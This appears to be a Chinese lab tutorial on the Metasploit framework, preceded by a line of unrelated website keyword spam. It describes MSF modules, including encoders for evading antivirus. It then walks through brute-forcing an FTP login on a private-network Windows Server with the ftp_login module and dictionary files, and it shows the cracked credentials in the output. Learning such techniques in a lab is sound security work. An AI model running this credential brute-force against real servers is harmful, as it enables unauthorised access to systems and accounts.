公司手机网站,国内适合个人做外贸的网站有哪些,杭州网站制作报价,东营志愿服务网一、环境准备
两台设备在同一个网络内
一台kali系统#xff1a;192.168.10.128
一台winserver2016#xff1a;192.168.10.132
二、MSF介绍
metasploit 全称是The Metasploit Framework#xff0c;又称MSF#xff0c;是Kali 内置的一款渗透测试框架#xff0c;也是全球…一、环境准备
两台设备在同一个网络内
一台kali系统192.168.10.128
一台winserver2016192.168.10.132
二、MSF介绍
metasploit 全称是The Metasploit Framework又称MSF是Kali 内置的一款渗透测试框架也是全球最受欢迎的渗透测试工具之一。
MSF允许使用者开发自己的漏洞脚本从而进行测试它还可以帮助安全和IT专业人士识别安全性问题验证漏洞的缓解措施提供真正的安全风险情报等。
分为专业版和免费版下载官网https://www.metasploit.com/
MSF框架由多个模块组成各个模块之间的功能如下
1、auxiliary辅助模块该模块不会直接在测试者和目标主机之间建立访问他们只会负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试
2、Exploit漏洞利用模块包括针对系统中的漏洞而设计的各种POC验证程序用于破坏系统安全性的攻击代码
3、Payload攻击模块用于在目标系统上运行任意命令或者执行特定代码在metasploit中可以自由地选择、传送和植入
4、Post后期渗透模块主要用于在取得目标系统远程控制权后进行一系列地后渗透攻击动作如获取敏感信息、实施跳板攻击等。
5、Encoders编码工具模块负责免杀 渗透攻击步骤 1、扫描目标系统寻找可用漏洞 2、选择并配置一个漏洞利用模块3、选择并配置一个攻击载荷模块 4、选择一个编码技术用来绕过杀软5、攻击渗透
三、使用ftp_login模块破解FTP密码
┌──(root㉿kali)-[~]
└─# msfconsole 进入框架
msf6 search ftp_login #搜索框架
msf6 use 0 #使用框架
#设置目标主机
msf6 auxiliary(scanner/ftp/ftp_login) set rhosts 192.168.10.132
#使用密码字典文件
msf6 auxiliary(scanner/ftp/ftp_login) set pass_file /root/pass.txt
#关闭信任凭据
msf6 auxiliary(scanner/ftp/ftp_login) set stop_on_success true
#设置登录的用户可以是文件
msf6 auxiliary(scanner/ftp/ftp_login) set username zhangsan
msf6 auxiliary(scanner/ftp/ftp_login) set user_file /root/user.txt
#攻击
msf6 auxiliary(scanner/ftp/ftp_login) exploit
[*] 192.168.10.132:21 - 192.168.10.132:21 - Starting FTP login sweep
[] 192.168.10.132:21 - 192.168.10.132:21 - Login Successful: zhangsan:admin.123
[*] 192.168.10.132:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
